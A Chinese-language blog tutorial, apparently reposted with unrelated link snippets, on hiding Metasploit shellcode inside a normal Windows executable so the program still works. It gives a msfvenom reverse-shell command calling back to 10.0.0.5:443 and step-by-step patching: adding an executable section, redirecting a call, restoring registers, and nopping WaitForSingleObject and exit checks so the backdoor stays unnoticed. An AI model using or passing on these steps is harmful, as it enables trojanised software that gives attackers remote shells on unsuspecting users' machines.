在不影响程序使用的情况下添加shellcode
参考
在文章Backdooring PE Files with Shellcode中介绍了一种在正常程序中注入shellcode的方式,让程序以前的逻辑照常能够正常运行,下面复现一下并解决几个小问题。
示例程序代码
这里直接编译一个32位的HelloWorld程序为例:
#include <stdio.h>
int main()
{
puts("Hello World!");
return 0;
}
编译后的exe,可以使用CFF Explorer
查看相关信息。
大致步骤
少绕弯子,补充一下通用步骤:
- 利用msf生成一个payload,保存成一个bin文件,命令:
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 | hexdump -C
- 通过010Editor等编辑工具在bin文件的前后各插入20-40个字节,以90填充
- 在目标exe中添加一个新的代码段,将bin的内容导入,并设置可读、可写、可执行、包含代码等属性标志
- 更新header大小以及重建PE头
- 使用x32dbg调试exe并查看新加代码段的基址,例如是
0x004A0000
- 一个5字节长度的指令,例如:
call 0x00471B50
,覆盖成jmp 0x004A0000
- 记住下一条指令的位置,例如:
0x00491EF8
,后面恢复程序正常逻辑的时候要用 - 编辑代码段开头,用
pushad
和pushfd
指令覆盖开头2个字节 - 调试exe,观察
pushfd
之后的ESP
值,例如0x010FFDBC
,以及shellcode执行结束时ESP
值,例如0x010FFBB8
,发现少了0x204
- 为了能够恢复之前的寄存器状态,在shellcode最后追加指令
add esp, 0x204
- 追加
popfd
和popad
指令,和push
顺序相反 - 将第6步中覆盖前的指令追加到
popad
之后 - 最后,恢复之前的运行逻辑,追加
jmp 0x00491EF8
指令,跳到第7步记录位置
问题1:到12和13步总是不能跳到正确的位置
注意三点:
- 第6步和第7步获取的值要保证当前调试的PE头大小是和最终的PE头大小是一致的,检查第4步操作
- 每次调试exe的时候,基址可能会发生变化,所以复制的指令只能用于修改当前调式实例
- 在复制jmp指令的机器码的时候,注意不要和目标跳转位置太近,会复制成短地址的指令
问题2:保证步骤没问题之后,程序仍然不能恢复正常逻辑
通过调试将发生阻塞的操作进行nop,例如WaitForSingleObject
,msf
的payload需要将4e 56 46 ff
替换成80 56 80 ff
原来给WaitForSingleObject
传的参数是-1
,会阻塞线程,想办法改成0就行,这里将dec esi
操作nop
掉了,push esi
就是0
问题3:在监听端失联的情况下,程序长时间阻塞后程序终止
应该是检查服务端失联的情况下直接终止程序了,通过调试找到终止位置nop掉即可
问题4:在哪找代码段的基址
除了参考文章中提到的通过文件偏移计算,还可以直接利用x32dbg的内存布局直接查看
最后效果
省略。。。
在不影响程序使用的情况下添加shellcode的更多相关文章
- Entity framework 意外删除了表,如何在不影响其它表的情况下恢复回来
关于EntityFramework数据迁移原理 查询数据库的表"__MigrationHistory",遍历代码库的Migrations文件夹下的所有文件,如果文件不在__Migr ...
- Linux不重启的情况下添加硬盘
众所周知,SATA和SCSI是支持热插拔的,但是新装了这类支持热插拔的驱动器,系统不会马上识别的,往往我们需要重启系统来识别,但是有另外一种方法可以很方面的让系统识别新的设备.作为系统管理员,需要了解 ...
- 该扩展程序未列在 Chrome 网上应用店中,并可能是在您不知情的情况下添加的
"chrome扩展程序无法启用"的解决方案 http://www.cnplugins.com/tool/installpluginfix.html win10家庭版没有组策略怎么办? https:// ...
- java 23种设计模式,一般情况下,常用的有哪些? 转载
原址:http://wangle.iteye.com/blog/196972 工厂模式, 工厂方法模式,单例模式, 外观(Facade)模式, 观察者(Observer)模式,桥接(Bridge)模式 ...
- mysql大表在不停机的情况下增加字段该怎么处理
MySQL中给一张千万甚至更大量级的表添加字段一直是比较头疼的问题,遇到此情况通常该如果处理?本文通过常见的三种场景进行案例说明. 1. 环境准备 数据库版本: 5.7.25-28(Percona 分 ...
- CentOS系统在不重启的情况下为虚拟机添加新硬盘
一.概述 用过虚拟机的都知道,如果在系统运行的时候去给虚拟机添加一块新设备,比如说硬盘,系统是读取不到这个新硬盘的,因为系统在启动的时候会去检测硬件设备.但是我们也可能会遇到这样的情况,比如正在运行比 ...
- 怎样在不对控件类型进行硬编码的情况下在 C#vs 中动态添加控件
文章ID: 815780 最近更新: 2004-1-12 这篇文章中的信息适用于: Microsoft Visual C# .NET 2003 标准版 Microsoft Visual C# .NET ...
- 转载:ubuntu 下添加简单的开机自启动脚本
转自:https://www.cnblogs.com/downey-blog/p/10473939.html linux下添加简单的开机自启动脚本 在linux的使用过程中,我们经常会碰到需要将某个自 ...
- 编写高质量代码改善C#程序的157个建议:第17个建议之多数情况下使用foreach进行循环遍历
今天是我看<编写高质量代码:改善C#程序的157个建议>第二遍的时候了,看完这本书的确是受益匪浅,学到了很多东西,也明白了很多道理. 里面的代码我每个都调试了一遍,有时候是有些出入的,可能 ...
随机推荐
- Presto 函数开发
0. 写在前面 Presto Functions 并不能像 Hive UDF 一样动态加载,需要根据 Function 的类型,实现 Presto 内部定义的不同接口,在 Presto 服务启动时进行 ...
- 使样式只在webkit内核生效
@media screen and (-webkit-min-device-pixel-ratio:0){ .do someting{ } } 使用媒体查询,制定样式
- java基础(五)--基本数据类型、占用字节、数值范围
一.Java基本数据类型 基本数据类型有8种:byte.short.int.long.float.double.boolean.char 分为4类:整数型.浮点型.布尔型.字符型. 整数型:byte. ...
- cookie 和session的简单比较
1.cookie数据存放在客户的浏览器上,session数据放在服务器上. 2.cookie不是很安全,别人可以分析存放在本地的COOKIE并进行COOKIE欺骗 考虑到安全应当使用session ...
- PHP gettimeofday() 函数
------------恢复内容开始------------ 实例 返回当前时间: <?php// Print the array from gettimeofday()print_r(gett ...
- P4221 [WC2018]州区划分 无向图欧拉回路 FST FWT
LINK:州区划分 把题目中四个条件进行规约 容易想到不合法当前仅当当前状态是一个无向图欧拉回路. 充要条件有两个 联通 每个点度数为偶数. 预处理出所有状态. 然后设\(f_i\)表示组成情况为i的 ...
- 经验分享:一个 30 岁的人是如何转行做程序员,进入IT行业的?
大约一年以前,我成为了一名全职开发者,我想要总结一下这一年的经验,并且和所有人分享,一个 30 多岁的人是如何进入科技行业的: 改变职业是一件吓人的事情,有时候还会成为一件危险的事情.年龄越大,危险就 ...
- JAVA学习:HashMap 和 ConcurrentHashMap
一.最基本的HashMap 和 ConcurrentHashMap 1.HashMap的结构和底层原理:由数组和链表组成,数组里面每个地方都存了Key-Value这样的实例,在Java7叫Entry ...
- python8.1多线程
import threadingimport time def run1 (name,sex): print(name,sex,"执行线程1") time.sleep(3)def ...
- javaweb 测试
题目要求: 1登录账号:要求由6到12位字母.数字.下划线组成,只有字母可以开头:(1分) 2登录密码:要求显示“• ”或“*”表示输入位数,密码要求八位以上字母.数字组成.(1分) 3性别:要求用单 ...